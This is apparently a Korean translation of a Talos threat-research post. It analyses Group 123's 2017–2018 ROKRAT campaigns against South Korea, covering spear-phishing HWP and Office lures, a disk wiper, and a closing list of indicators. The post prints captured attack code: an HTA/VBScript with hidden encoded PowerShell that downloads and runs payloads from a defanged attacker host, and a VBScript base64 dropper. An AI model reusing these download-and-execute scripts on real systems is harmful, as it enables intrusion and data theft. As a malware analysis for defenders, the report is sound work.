주요 공격 대상 – 대한민국
주요 공격 대상 – 대한민국
2018.01.16 15:15
특정공격조직이대한민국을주요대상으로진행한여러캠페인들에대한 1년동안의검토결과.
이블로그게시물은Warren Mercer와Paul Rascagneres가작성하였으며 Jungsoo An의도움을받아최종적으로작성되었습니다.
Executive Summary
이기사에서는 2017년에 Group
123이진행한악성활동에대해보여드립니다. 우리는분석을통해다음과같은 여섯가지캠페인이 Group 123에의해진행되었음을확신하고있습니다.
–“골든타임” 캠페인
–“사악한새해” 캠페인
–“행복하십니까?” 캠페인
–“FreeMilk” 캠페인
–“북한인권” 캠페인
–“사악한새해 2018년” 캠페인
2018년 1월 2일에 “사악한새해 2018년” 캠페인이시작되었습니다. 이캠페인은 2017년 “사악한새해” 캠페인의접근방식을그대로따르고있습니다.
이두캠페인사이의링크는여러캠페인들전반에존재하는‘공유코드’및‘PDB(프로그램데이터베이스)’와같은컴파일러아티팩트패턴등을포함합니다.
분석결과에따르면 “골든타임“,
“사악한새해“, “북한인권” 캠페인은모두대한민국사용자를특정대상으로삼고있습니다. 공격자는한컴오피스제품군을사용하여만든악성 HWP 문서와결합된스피어피싱이메일을사용했습니다.
Group 123은 OLE 개체를활용하는스크립팅언어또는익스플로잇(예: CVE-2013-0808)을사용하는것으로알려져있습니다. 이러한악성문서의목적은 RAT(원격관리툴)인 ROKRAT을설치하고실행하는것이었습니다. 경우에따라공격자는 ROKRAT
페이로드를악성문서에직접적으로포함시켰으며, 다른캠페인을수행하는동안다단계감염프로세스를활용했습니다. 이러한문서는위험에노출된웹서버에서 ROKRAT을다운로드하도록설계된다운로더만을포함하였습니다.
또한,
“FreeMilk”캠페인은한국금융기관이외여러금융기관을대상으로했습니다. 이캠페인에서공격자는일반적으로사용하던한컴문서를벗어나악성
Microsoft Office문서를사용했습니다. 이문서는최신취약점인 CVE-2017-0199를익스플로잇했습니다. Group 123이이취약점을이용한때는그것이대중에게공개된지한달도채되지않은시점이었습니다. 이캠페인을수행하는동안공격자는
PoohMilk와 Freenki라는 2개의서로다른악성바이너리를사용했습니다. PoohMilk는 Freenki를실행하려는용도로만존재하며, Freenki는감염된시스템에대한정보를수집하고후속단계의페이로드를다운로드하는데사용됩니다. 이악성코드는 2016년에여러캠페인에서사용되었으며일부 ROKRAT과중복된코드를포함하고있습니다.
마지막으로,
Group 123과연결된 여섯번째캠페인을파악했습니다. 이 여섯번째캠페인의이름은 “행복하십니까?”입니다. 이캠페인에서공격자는디스크와이퍼를구축했으며, 공격의목적은감염된원격시스템에대한액세스권한을얻어디바이스의첫번째섹터를지우는것이었습니다. 이와이퍼는 ROKRAT 모듈인것으로확인되었습니다.
이공격조직은올해매우활발하게활동했으며계속해서대한민국을주요공격대상으로삼았습니다. 이그룹이활용한스피어피싱캠페인및악성문서의경우, 번역서비스를사용하지않고한국현지인이작성한것으로보이는대단히구체적인표현이내용에포함되어있었습니다. 공격조직은다음을수행할수있습니다.
–워크플로에익스플로잇(한글및 Microsoft Office용) 포함하기
–페이로드를여러단계로분할하여해당캠페인수정하기
–침해된웹서버또는합법적인클라우드기반의플랫폼사용하기
–HTTPS 통신을사용하여트래픽분석을더어렵게만들기
–서드파티의보안을침해하여실제처럼느껴지는스피어피싱캠페인위조하기(예: “골든타임” 캠페인에서의연세대학교사칭)
–2018년에는파일리스공격방식을사용하는등공격조직은계속해서진화
타임라인
2017년부터 2018년초에이르기까지의타임라인을정리해보면다음과같습니다.
2016년 8월~2017년 3월: “골든타임” 캠페인
Group 123 캠페인대다수와마찬가지로이캠페인을수행하는동안의초기공격벡터는스피어피싱이었습니다.
Talos는서로다른두종류의이메일을확인했으며, 이중에서첫번째로발견한이메일이가장흥미로웠습니다. 이샘플에서는공격자가 “통일·북한학술대회” 관련패널로합류하도록사용자를유도한다는점이관찰되었습니다. 이메일에는수신자가첨부된문서를작성하여필요한피드백을제공해야한다고설명되어있습니다. 이는존재하지않는학술대회인것으로보입니다. 통일학술대회와가장비슷한학술대회는 2017년 1월에개최되었던 NYDA 통일학술대회인것으로확인되었습니다. 발신자는
‘kgf2016@yonsei.ac.kr’로, 별도의학술대회인한반도국제포럼의담당자이메일이었습니다. 이메일헤더를분석한결과이이메일은연세대학교네트워크와연결된 IP를사용하는 SMTP 서버에서전송되었음이확인되었습니다. 공격자가이이메일주소의보안을침해하고이를악용하여이캠페인에서사용된이메일을전송한것으로보입니다. 악성첨부파일의파일이름은통일학술대회에관한이메일내용을뒷받침하는 ‘통일북한학술대회 – 심사서류‘로변환됩니다. 이메일본문에서공격자는문서를작성한사람에게 ‘소정의사례금‘을제공할것이라고제안하기도합니다. 여기서말하는사례금이란아마도임베디드악성코드일것입니다.
Talos가분석한두번째이메일은더간단히만들어진이메일이었습니다. 이이메일은 Daum에서제공하는한국의무료이메일서비스인한메일로전송되었습니다. 앞에서설명한이메일과달리여기서는공식기관또는개인이발신한것처럼보이려고시도하지않았습니다. 제목은간단한 ‘도움요청‘이었으며, 첨부파일의이름은 ‘저는요북조선강원도문천사람이에요.’였습니다. 여기서공격자는이메일을읽는사람에게강원도문천(1945년에한국이분단되기전에대한민국강원도에속했던지역)을언급함으로써동정심을유발하려던것으로의심됩니다.
두번째이메일에는도움을필요로하는 ‘김아령‘이라는사람에관한이야기가포함되어있습니다.
이메일의첨부파일은서로다른 2개의 HWP 문서이며, 두문서에서는모두동일한취약점(CVE-2013-0808)을활용합니다. 이취약점은
EPS(Encapsulated PostScript)형식을대상으로합니다. 셸코드의목적은인터넷에서페이로드를다운로드하는것입니다. 첫번째이메일에서는감염된사용자에게다음과같은악성문서가표시되고다음과같은페이로드가다운로드됩니다.
–hxxp://discgolfglow[.]com:/wp-content/plugins/maintenance/images/worker.jpg
두번째이메일에서는감염된사용자에게다음과같은악성문서가표시되고다음과같은페이로드가다운로드됩니다.
–hxxp://acddesigns[.]com[.]au/clients/ACPRCM/kingstone.jpg
두경우모두다운로드된페이로드는
ROKRAT악성코드입니다.
이러한 ROKRAT 변종이수행하는첫번째작업은운영체제버전을확인하는것입니다.
Windows XP가탐지되면이악성코드는무한루프를실행합니다. 이는 Windows XP 머신을실행하는샌드박스시스템에서열린경우, 비어있는보고서를생성하기위함입니다. 이악성코드는또한현재감염된시스템에서일반적인분석툴이실행되고있는지확인합니다. 이러한툴이있다고탐지되는경우이악성코드는다음과같이합법적인웹사이트를대상으로 2개의네트워크요청을수행합니다.
–hxxps://www[.]amazon[.]com/Men-War-PC/dp/B001QZGVEC/EsoftTeam/watchcom.jpg
–hxxp://www[.]hulu[.]com/watch/559035/episode3.mp4
Amazon URL에서는 ‘맨오브워‘라는 WWII 게임을표시하며, Hulu
URL에서는 ‘골든타임‘이라는일본애니메이션쇼의스트리밍을시도합니다.
ROKRAT을식별할수있는특징중하나는 ROKRAT이소셜네트워크및클라우드플랫폼을사용하여공격자와통신한다는점입니다. 이러한플랫폼은문서를추출하고명령을수신하는데사용됩니다. 이변종에서사용되는플랫폼은
Twitter, Yandex, Mediafire입니다. 각플랫폼에대한토큰은다음과같이샘플내에하드코딩되어있습니다.
2016년 11월~2017년 1월: “사악한새해” 캠페인
2017년초에 Group 123은 “사악한새해” 캠페인을시작했습니다. 이캠페인에서공격조직은대한민국통일부에서대한민국에국한된분석을제공하는이메일을보낸것으로가장하여피해자를속이려고시도했습니다. 이캠페인은대한민국을대상으로하며악성첨부파일을포함하는소수의스피어피싱이메일로시작되었습니다.
Group 123은피해자가일반적인한컴문서를사용하여첨부파일을열도록유도하기위해추가적인시도를했습니다.‘한컴’사의한글은한국에서주로사용되는주요오피스제품군입니다. 한컴오피스문서는일반적으로한국표준문서로사용되고있습니다. 공격자가 Microsoft 문서를사용했다면피해자가의심했을수있습니다. 해당지역의파일형식을사용하는경우이러한형식은일부보안소프트웨어제품에서제대로처리되지않을수있으며이를통해공격자가빠져나갈수있게됩니다.
이문서는
“2017년北신년사분석“이라는제목으로대상에게발송되었으며, 여기에서대한민국통일부의공식로고가사용되었습니다. 공격조직이간단히사용할수있는이로고는이문서가해당지역과연관성이높아보이게만듭니다.
이 문서에서는 북한의 새해 활동에 대해 논의한다고 주장했으며, 이는 대한민국의 피해자가 매우 관심을 가질 수 있을 만한 내용이었을 것입니다. 이 문서는 Group 123이 선택한 대상이라고 생각되는 정부 기관에서 특히 관심을 가질만한 내용이었습니다.
이 문서의 목적은 사용자가 페이지 아래의 임베디드 악성 문서를 열도록 유도하는 것이었습니다.
공격조직은 2개의추가링크를임베드하고이문서에서사용자가북한의새해활동에관한자세한내용을확인하기위해이러한링크를클릭하도록유도했습니다. 첫번째링크는
“’16년및 ’17년주요과업비교“라고레이블이지정되어있으며, 두번째링크는 “’16년및 ’17년대남분야비교“라고레이블이지정되어있습니다.
이러한링크를열면사용자에게추가적인악성한글문서가표시되었습니다. 잘작성된이문서는새로운한국공격조직이나타났다는점에대해더확신을가지게합니다. 이러한문서에는바이너리를설치하는데사용되는악성 OLE 개체가포함되어있었습니다.
그러나이번에는악성
OLE(Object Link Embedded)개체가포함되어있었습니다.
초기분석에서는이문서내의크기가비슷한두 OLE 개체파일이똑같이실행된다는점이확인되었습니다.
설치된두바이너리는분석중에다음위치에서저장및실행되었습니다.
–C:UsersADMINI~1AppDataLocalTempHwp
(2).exe
–C:UsersADMINI~1AppDataLocalTempHwp
(3).exe
초기분석에서는 Group
123의몇가지허술했던정리작업이드러났습니다. 이내용은다음과같은바이너리내에컴파일아티팩트로남아이후에별도의캠페인이동일한공격조직의작업이었는지판단하는데사용되었습니다.
–e:HappyWorkSourceversion
12T+MResultDocPrint.pdb
설치된바이너리의두번째단계는이프로세스에셸코드를삽입하고
wscript.exe를실행하는데사용되었습니다. 셸코드는리소스 ‘BIN’ 내에임베디드되어있으며다른 PE32 바이너리의압축을풀고
wscript.exe를사용하여해당바이너리를실행하는데사용됩니다. 이를수행하기위해 Group 123은VirtualAllocEx(), WriteProcessMemory()및CreateRemoteThread() Windows API 호출을활용하는, 잘알려진기술을사용합니다.
쉘코드로부터압축이풀린새로운PE32
파일은최종페이로드를얻기위하여 C2 인프라스트럭쳐와통신하는데사용되는초기정찰악성코드입니다. 이악성코드가수집한정보에는다음이포함됩니다.
–컴퓨터이름
–사용자이름
–샘플의실행경로
–BIOS 모델
–시스템을고유하게식별하기위해임의로생성된 ID
Group 123은이방법을활용하여피해자가 (a) 추가로대상으로삼길원했던대상이며 (b) 정찰단계에서얻은정보에기초하여추가로감염시킬수있는대상인지확인했습니다.
추가네트워크분석을통해바이너리가다음 URL에연결하려고시도했음을알게되었습니다.
–www[.]kgls[.]or[.]kr/news2/news_dir/index.php
–www[.]kgls[.]or[.]kr/news2/news_dir/02BC6B26_put.jpg
한국정부법무공단(KGLS)은한국정부의법률사무를관리하는합법적인한국정부기관입니다. 공격자는 KGLS의보안을침해하여공격을실행할신뢰할수있는플랫폼을확보했습니다.
초기네트워크연결은
‘index.php’에대한연결입니다. 이연결은정찰단계에서수집한정보를전송합니다. 공격자는이정보를사용하여감염된피해자에게서비스를제공하기위해특정한파일이름(임의 ID 기준)을결정합니다. 이사례에서는파일이름이 02BC6B26이었는데이는공격자 C2에서“02BC6B26_put.jpg“파일이생성되었음을의미합니다. 그러고나서이파일은설치되고피해자머신에서
‘officepatch.exe’로이름이변경되었습니다. 공격자가공격대상에대해신중하게행동했기때문에분석중에이파일을확보할수없었습니다.
분석을통해이공격조직이사용한추가적인명령제어인프라스트럭쳐를식별할수있었습니다. 다음국가에기반을둔 4개의 C2가관찰되었습니다.
–대한민국에기반을둔 3개의 C2
–네덜란드에기반을둔 1개의 C2
식별된인프라스트럭쳐의글로벌맵은다음과같습니다.
이전캠페인과반대로공격자는기본 ROKRAT 페이로드에서정찰단계를분리했습니다. 이트릭은탐지를피하기위해사용되었을가능성이높습니다. 이는 Group
123의흥미로운적응방식입니다.
2017년3월: “행복하십니까?”캠페인
2017년 3월에 Group 123은디스크와이퍼를컴파일했습니다. 악성코드에는 1개의함수가포함되어있으며, 이함수의목적은감염된시스템의드라이브(\.PhysicalDrive0)를열고 MBR에다음데이터를작성하는것입니다.
작성된버퍼에
“Are you Happy?”(행복하십니까?)라는문자열이표시됩니다. 악성코드는 MBR에데이터를작성한후다음명령을사용하여머신을재부팅합니다. c:windowssystem32shutdown /r /t 1
재부팅후 MBR에서는사용자에게다음과같은문자열을표시합니다.
다른캠페인의링크는다음 PDB 경로로연결되었습니다.
–D:HighSchoolversion
13VC2008(Version15)T+MT+MTMProjectReleaseErasePartition.pdb
보시다시피이는 ROKRAT
PDB와완벽하게일치합니다. 이와이퍼는 ERSP.enc라는이름의 ROKRAT 모듈입니다. ERSP는
ERaSePartition을의미하고있을것으로추정합니다. 이모듈은 Group 123의요구에따라다운로드및실행될수있습니다.
이는한국의발전소를대상으로한 2014년 12월의공격에서와이퍼가표시한메시지가
“Who Am I?”였다는점을고려해보면흥미로운샘플입니다.
2017년 5월: “FreeMilk” 캠페인
이캠페인은한국이외금융기관을대상으로했지만다른캠페인과달리 HWP 문서를사용하지않고 Office 문서를사용했습니다. 이러한변화는 Group
123이이캠페인을수행하는동안에는대한민국을대상으로하지않았으며, 나머지국가에서는 Microsoft Office를사용하는것이일반적이기때문입니다.
감염벡터
공격자는
Microsoft Office내에악성 HTA 문서를다운로드하고실행하기위해 CVE-2017-0199를익스플로잇했습니다. 사용된 URL은임베디드 OLE 개체에서찾을수있습니다.
hxxp://old[.]jrchina[.]com/btob_asiana/udel_calcel.php?fdid=[base64_data]
다운로드한 HTA 문서의소스코드는다음과같습니다.
<!DOCTYPE html PUBLIC “-//W3C//DTD
XHTML 1.0 Transitional//EN”
“http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html
>
<head>
<meta content=”text/html; charset=utf-8″
http-equiv=”Content-Type” />
<title>Bonjour</title>
<script language=”VBScript”>
Set
owFrClN0giJ = CreateObject(“Wscript.Shell”)
Set v1ymUkaljYF = CreateObject(“Scripting.FileSystemObject”)
If
v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings(“%PSModulePath%”)
+ “..powershell.exe”) Then
owFrClN0giJ.Run “powershell -nop -windowstyle hidden
-executionpolicy bypass -encodedcommand
JABjAD0AbgBlAHcALQBvA[…redacted…]H0AIAA=” ,0
owFrClN0giJ.Run “cmd /c echo
hta>%tmp%webbrowser1094826604.tmp”, 0
End
If
Self.Close
</script>
<hta:application
id=”oHTA”
applicationname=”Bonjour”
application=”yes”
>
</head>
</html>
Base64 알고리즘을사용하여디코딩하면최종페이로드를읽을수있습니다.
$c=new-object System.Net.WebClient
$t =$env:temp
$t1=$t+”\alitmp0131.jpg”
$t2=$t+”\alitmp0132.jpg”
$t3=$t+”\alitmp0133.js”
try
{
echo $c.DownloadFile(
“hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg”,$t1)
$c.DownloadFile(
“hxxp://old[.]jrchina[.]com/btob_asiana/appach02.jpg”,$t2)
$c.DownloadFile(
“hxxp://old[.]jrchina[.]com/btob_asiana/udel_ok.ipp”,$t3)
wscript.exe $t3
}
catch
{
}
이스크립트의목적은 Windows
스크립트와 2개의인코딩된페이로드를다운로드하고실행하는것입니다. 스크립트는다음페이로드를디코딩및실행하는데사용됩니다.
–Appach01.jpg(변경된이름: Windows-KB275122-x86.exe)는 Freenki 샘플입니다.
–Appach01.jpg(변경된이름: Windows-KB271854-x86.exe)는 PoohMilk 샘플입니다.
PoohMilk 분석
PoohMilk 샘플은다음과같은 2개의작업을수행하기위해설계되었습니다.
–지속성을생성하여다음재부팅시 Freenki 샘플을실행합니다.
–감염된머신에서특정파일을확인합니다.
첫번째작업은이전에다운로드한Windows-KB275122-x86.exe파일을실행하기위해레지스트리키를생성하는것입니다. 파일은“help”인자를사용하여실행됩니다. 레지스트리생성은다음과같습니다.
지속성이생성된레지스트리위치:HKCUSoftwareMicrosoftWindowsCurrentVersionRunWindows
Update. 다음재부팅시악성코드가실행됩니다.
두번째작업은
“wsatra.tmp”파일이현재사용자의임시디렉토리에있는지확인하는것입니다. 이파일이있는경우파일내용은 LNK(링크) 확장자를가진두번째파일을찾는데필요한경로를얻는데사용됩니다. LNK 파일은마지막으로세번째파일인 ZIP 파일을식별하는데사용됩니다. 이파일은 RTF 문서를검색하기위해확장되며, 이문서는 Wordpad
실행을통해감염된사용자에게표시됩니다.
PoohMilk 샘플의 PDB 경로는다음과같습니다.
–E:BIG_POOHProjectmilkReleasemilk.pdb
Freenki 샘플
Freenki의목적은감염된시스템에서정보를수집하고세번째실행파일을다운로드하는것입니다.
이샘플은다음과같이서로다른 3가지인수를사용하여실행될수있습니다.
–“Help”: PoohMilk에의해구성된값. 이상황에서는기본함수가실행됩니다.
–“Console”: 이인수를사용하면지속성이구성되며다음재부팅시악성코드가실행됩니다(HKCUSoftwareMicrosoftWindowsCurrentVersionRunrunsample).
–“Sample”: 이인수를사용하면악성코드가 console 명령을실행한다음 help 명령을실행합니다.
수집된정보는 WMI 쿼리를사용하여수행됩니다.
또한, 악성코드는
Microsoft Windows API를통해실행중인프로세스를나열합니다. 악성코드는난독화를사용하여 URL 또는사용자에이전트등의문자열을숨기며, 이알고리즘은비트연산(SUB
0x0F XOR 0x21)을기반으로합니다. 디코딩된데이터는다음과같습니다.
–hxxp://old[.]jrchina[.]com/btob_asiana/udel_confirm.php
–Mozilla/4.0
(compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727;
.NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet
PC 2.0; .NET4.0E; InfoPath.3)
다운로드된세번째페이로드도동일한기술을사용하여난독화되며, 파일은
“PNGF”로시작하는가짜이미지입니다.
2017년 11월: “북한인권” 캠페인
2017년 11월에 Talos는올해의최신 Group
123캠페인을관찰했습니다. 이캠페인에는최신공격흐름에서사용되고있는새버전의 ROKRAT이포함되어있습니다. Group 123은주요공격활용카드중하나인악성 hwp 문서를다시사용했으며, 이번에는대한민국서울에서 11월 1일에개최된회의와관련된정보가포함된문서를사용했습니다. 이문서는 “북한인권및한반도통일을위한시민연대“를대표한다는한변호사가작성했다고주장했습니다.
Group 123은남북통일과관련된정보를한번더사용하면서이제인권문제와관련된쟁점을강조하고있습니다.
Talos는이문서에서새버전의 ROKRAT을찾을수있었습니다. 일반적인 Group
123활동과마찬가지로이문서도완벽한한국어텍스트와방언으로작성되었으며, 이점은해당조직이한반도를기반으로하고있음을시사합니다.
문서텍스트에대한추가분석을통해상황을이해할수있었습니다. 이문서에서는
“북한인권및한반도통일을위한시민연대“에속해있다고주장하는변호사가 ‘올바른인권통일을위한시민모임‘에대해언급하고있습니다. 이문서의주요목적은대한민국에서 2016년에통과된 “북한인권법” 및 “시행령제정“과관련된사항을논의하는회의를마련하는것이었습니다. 이기사는 ‘올인통‘ 시민모임내의이해관계자가토론에참여하도록유도하여이러한활동과관련된추가적인아이디어작업을수행해보고자했습니다. 회의는 2017년 11월 1일에열릴예정이었으며이문서는회의전에더많은관심을얻기위한것이었습니다.
Group 123은다시한번 HWP 문서내의 OLE 개체를활용했습니다. 분석은 zlib 압축해재(HWP
문서의표준작업)로시작되며, 이를통해다음스크립트를복구할수있습니다.
const
strEncode =
“TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hV[…redacted…]AAAAAAAAAAAAAAAAAAAAAA=”
DIM outFile
DIM base64Decoded
DIM shell_obj
SET shell_obj = CreateObject(“WScript.Shell”)
DIM fso
SET fso = CreateObject(“Scripting.FileSystemObject”)
outFile = “c:ProgramDataHncModuleUpdate.exe”
base64Decoded = decodeBase64(strEncode)
IF NOT(fso.FileExists(outFile)) then
writeBytes outFile, base64Decoded
shell_obj.run outFile
END IF
WScript.Quit()
private function decodeBase64(base64)
DIM DM, EL
SET DM = CreateObject(“Microsoft.XMLDOM”)
SET EL = DM.createElement(“tmp”)
EL.DataType = “bin.base64”
EL.Text = base64
decodeBase64 = EL.NodeTypedValue
end function
private Sub writeBytes(file, bytes)
DIM binaryStream
SET binaryStream = CreateObject(“ADODB.Stream”)
binaryStream.Type = 1
binaryStream.Open
binaryStream.Write bytes
binaryStream.SaveToFile file, 1
End Sub
이스크립트는 strEncode
변수내에서정적 base64 문자열을디코딩하는데실행및사용됩니다. base64 인코딩을사용하여디코딩된바이너리가 HncModuleUpdate.exe로저장된다음실행됩니다. 이는 ROKRAT 드로퍼입니다. 파일이름은실행되고있는프로세스중에잠재적인한컴업데이트프로그램으로표시되도록선택된것으로의심됩니다.
드로퍼는 SBS라는이름의새로운리소스를추출하는데사용됩니다. 이러한특정리소스에는악성코드에서사용되는악성셸코드가포함되어있습니다. 또한, cmd.exe
프로세스가프로세스삽입을위해VirtualAlloc(), WriteProcessMemory()및CreateRemoteThread()Windows API를사용하여실행및사용되었습니다. 처음발견된 ROKRAT과같이유사한 Windows
API가계속사용되고있습니다. 아래와같이 IDA의그래프보기를통해이러한단계들을확인할수있습니다.
이러한실행단계에서는 PE 바이너리를디코딩하고
cmd.exe프로세스에삽입함으로써새로운 ROKRAT 변종을실행할수있습니다.
이캠페인에서 Group
123의특이한점중하나는사용자에게다음과같은사진을악성이미지로제공했다는점입니다. 이러한이미지는한국의‘독립운동’및한국전쟁과관련이있는것으로대중적으로공개되어있는이미지입니다.
이새로운버전의 ROKRAT에대해보다심층적인분석을수행하자 Group
123의 “사악한새해” 캠페인과의몇가지유사점을발견하기시작했습니다. 이유사점에대해서는이글의뒷부분에서설명되어있습니다.
이 ROKRAT 변종에는안티샌드박스기술이포함되어있습니다. 이변종은다음과같은라이브러리가피해자머신에로드되었는지를확인하여수행됩니다.
–SbieDll.dll(sandboxie 라이브러리)
–Dbghelp.dll(Microsoft 디버깅툴)
–Api_log.dll(threatAnalyzer/GFI SandBox)
–Dir_watch.dll(threatAnalyzer/GFI SandBox)
이 ROKRAT 변종에서분석을어렵게만들기위해사용한몇가지다른기술을발견할수있었는데, Group
123은 NOP(No Operation)와관련된안티디버깅기술을사용했습니다.
nop dword ptr [eax+eax+00h]는 5바이트 NOP입니다. 그러나이 opcode는일부디버깅툴에서올바르게지원되지않습니다. 예를들어, Immunity
Debugger에서는어셈블리를빨간색 “???”로대체하여디버깅시도를어렵게만듭니다.
브라우저도용메커니즘이도입된이버전의 ROKRAT은일부수정된부분을포함하여 2016년 Freenki 악성코드를사용한
FreeMilk캠페인에활용된것들과유사합니다.
Group 123은이캠페인에서클라우드플랫폼(이번에는 pCloud, Dropbox, Box, Yandex 활용)을계속사용했습니다.
마지막으로이캠페인을수행하는동안사용된샘플의 PDB는다음과같습니다.
–d:HighSchoolversion
132ndBDT+MT+MResultDocPrint.pdb
2018년 1월: “사악한새해 2018년” 캠페인
2017년초에관찰한것과같이 Group 123은 2018년새해에맞춘캠페인을시작했습니다. 이캠페인은 1월 2일에시작되었습니다. 감염벡터는다음과같은악성 HWP 문서였습니다.
이악성문서는북한지도자의 2018년신년사를분석한것입니다. 이러한접근방식은 2017년에확인되었던새로운악성문서를사용하는방식과정확히동일합니다. 이문서는왼쪽상단의로고에서도알수있듯이통일부에서작성했다고주장했습니다.
이문서는 “골든타임” 캠페인과비슷하게보안이침해된웹사이트에있는셸코드를다운로드및실행하기위해 EPS 취약점을익스플로잇합니다.
–hxxp://60chicken[.]co[.]kr/wysiwyg/PEG_temp/logo1.png
가짜이미지를사용하는것은이그룹의일반적인패턴입니다. 이러한이미지에는임베드된최종페이로드인
ROKRAT을디코딩하는데사용된셸코드가포함되어있습니다. 이 ROKRAT 변종은메모리에서로드됩니다. 이는파일리스버전의 ROKRAT 입니다. 이행동은 Group 123이탐지를피하기위해끊임없이진화하고있음을보여줍니다. 평소와같이 ROKRAT 샘플은클라우드제공자(이번에는
Yandex, pCloud, Dropbox, Box활용)를사용하여작업자와통신합니다.
캠페인간의링크
코드공유
Talos는 Group 123이서로다른악성코드간에코드를공유한다는점을확인했습니다. 이기사에서언급된샘플에서공유되는여러가지기능이있지만, 이문서에서는 2가지기능, 즉정찰단계및브라우저도용자만다루도록하겠습니다.
정찰단계
“사악한새해” 및 “북한인권” 캠페인 2가지를수행하는동안사용된 ROKRAT 샘플에는정찰단계가포함되어있습니다.
“사악한새해” 캠페인에서는페이로드가두부분으로분할되었으며첫번째부분에정찰코드가포함되었습니다. 다른캠페인에서는정찰단계가기본페이로드에바로포함되었습니다. 이코드는동일합니다.
악성코드는머신유형을확인하기위해다음과같은레지스트리키를사용합니다. HKLMSystemCurrentControlSetServicesmssmbiosDataSMBiosData“시스템제조업체” 값이머신유형을식별하는데사용됩니다. 해당코드는사용된 Win32
API의사용방법을설명하는포럼게시물(rohitab.com)에기반하는것으로나타납니다. 소스코드는다음머신유형만고려합니다.
default:lpString = “(Other)”;break;
case 0x02: lpString = “(Unknown)”;break;
case 0x03: lpString = “(Desktop)”;break;
case 0x04: lpString = “(Low Profile Desktop)”; break;
case 0x06: lpString = “(Mini Tower)”;break;
case 0x07: lpString = “(Tower)”;break;
case 0x08: lpString = “(Portable)”;break;
case 0x09: lpString = “(Laptop)”;break;
case 0x0A: lpString = “(Notebook)”;break;
case 0x0E: lpString = “(Sub Notebook)”;break;
()를사용하는문자열형식과고려중인유형은 ROKRAT 샘플에서사용된것과정확히동일합니다.
흥미로운점은이정찰단계가 “골든타임” 캠페인진행중에사용된 ROKRAT 변종에는포함되지않았다는점입니다.
브라우저스틸러
“북한인권”캠페인진행중에사용된 ROKRAT 샘플에처음으로브라우저크리덴셜스틸러가포함되었습니다. 이작업을수행하는데사용된코드는 2016년에구축된 Freenki
샘플에서발견된코드와동일합니다.
악성코드는
Internet Explorer, Chrome, Firefox에서저장된암호를추출할수있습니다. Chrome, Firefox의경우, 악성코드는 URL, 사용자이름및비밀번호를포함하는 sqlite
데이터베이스를쿼리합니다:
또한, 이러한항목은
Microsoft Vault메커니즘을지원합니다. Vault는 Windows 7에서구현되었으며, Internet explorer 의모든민감한데이터(자격증명)를포함합니다.
Vault API의초기화는다음과같습니다.
왼쪽은 ROKRAT 샘플이고오른쪽은
FreeMilk샘플입니다. 코드외에도작성자가 “IE Registery“와같은영어오타를그대로복사/붙여넣기한것을확인할수있습니다.
PDB 경로
이기사에서언급된모든바이너리의 PDB 명명규칙에서는패턴을분명하게식별할수있습니다.
ROKRAT:
–e:HappyWorkSourceversion
12T+MResultDocPrint.pdb(출처: “사악한새해” 캠페인)
–d:HighSchoolversion
132ndBDT+MT+MResultDocPrint.pdb(출처: “북한인권” 캠페인)
–D:HighSchoolversion
13First-Dragon(VS2015)SampleReleaseDogCall.pdb(6월의미확인캠페인의 ROKRAT 샘플)
와이퍼:
–D:HighSchoolversion
13VC2008(Version15)T+MT+MTMProjectReleaseErasePartition.pdb(출처: “행복하십니까?”
캠페인)
요약그래프
이기사에서언급된각캠페인간의유사점과차이점을시각적으로표시한그래프는다음과같습니다.
결론
대한민국은악성공격조직들의주요타겟이되고있으며, 이들은악성행위의대상이정보, 문서또는이메일을합법적인것으로느끼도록유도하기위해자연스러운한국어를사용하는등지역적특색에맞춰기술을변화시키고있습니다. 특정캠페인에서이러한공격조직은스피어피싱캠페인을위조하거나명령및제어를호스팅하기위해시간을들여여러합법적인한국플랫폼(연세대학교및 KGLS 포함)의보안을침해했습니다. 이러한접근은이보다덜지능적인공격조직에서는거의찾아볼수없는방식입니다. 이러한사실을통해이공격조직이상당한수준의성숙도를갖췄으며한국지역관련지식또한보유하고있음을알수있습니다.
그러나 Group
123의활동범위는대한민국뿐만이아닙니다. 한국에있는피해자를대상으로할때는특정 HWP 문서를사용했다면, 전세계를대상으로할때는반대로 Microsoft Office 문서를사용하는등더일반적인공격벡터로전환할수있습니다. Group 123은망설이지않고공개익스플로잇과스크립팅언어를사용하여악성페이로드를설치및실행합니다. 이그룹은보안이침해된합법적인웹사이트(주로
Wordpress)및클라우드플랫폼을사용하여감염된시스템과통신합니다. 이러한접근방식은이들네트워크플로우분석을통한통신탐지작업을어렵게만듭니다. 이공격조직이사용한공격수단의종류는매우다양했으나, 우리는일부패턴, 다양한공개저장소에서복사하여붙여넣기한코드, 서로다른코드간의유사점등을파악하는데성공했으며, 원격관리툴뿐만아니라와이퍼또한파악하였습니다. 이그룹은인텔리전스수집캠페인에참여했으며최종적으로파괴공격을시도했다고결론내릴수있습니다.
이공격조직에대한최신분석결과에따르면이공격조직은당분간사라지지않고앞으로도계속활발히활동할것으로예상됩니다.
Group 123은 ROKRAT에파일이없는새로운방식을추가한점에서알수있듯이끊임없이진화하고있습니다. 또한, 이그룹의대상프로파일링은변화할수있지만현재로서는한반도가주요대상이라고판단됩니다. 그러나앞에서설명한것과같이이그룹은 TTP를추가로조정하여시간이지남에따라계속진화할가능성이높습니다.
IOC
“골든타임” 캠페인:
악성문서 #1 sha256: 7d163e36f47ec56c9fe08d758a0770f1778fa30af68f39aac80441a3f037761e악성문서 #2 sha256: 5441f45df22af63498c63a49aae82065086964f9067cfa75987951831017bd4fROKRAT #1: cd166565ce09ef410c5bba40bad0b49441af6cfb48772e7e4a9de3d646b4851cROKRAT #1:
051463a14767c6477b6dacd639f30a8a5b9e126ff31532b58fc29c8364604d00
네트워크:악성 URL:– hxxp://discgolfglow[.]com/wp-content/plugins/maintenance/images/worker.jpg– hxxp://acddesigns[.]com[.]au/clients/ACPRCM/kingstone.jpg보안 URL:– hxxps://www[.]amazon[.]com/Men-War-PC/dp/B001QZGVEC/EsoftTeam/watchcom.jpg–
hxxp://www[.]hulu[.]com/watch/559035/episode3.mp4
“사악한새해” 캠페인:
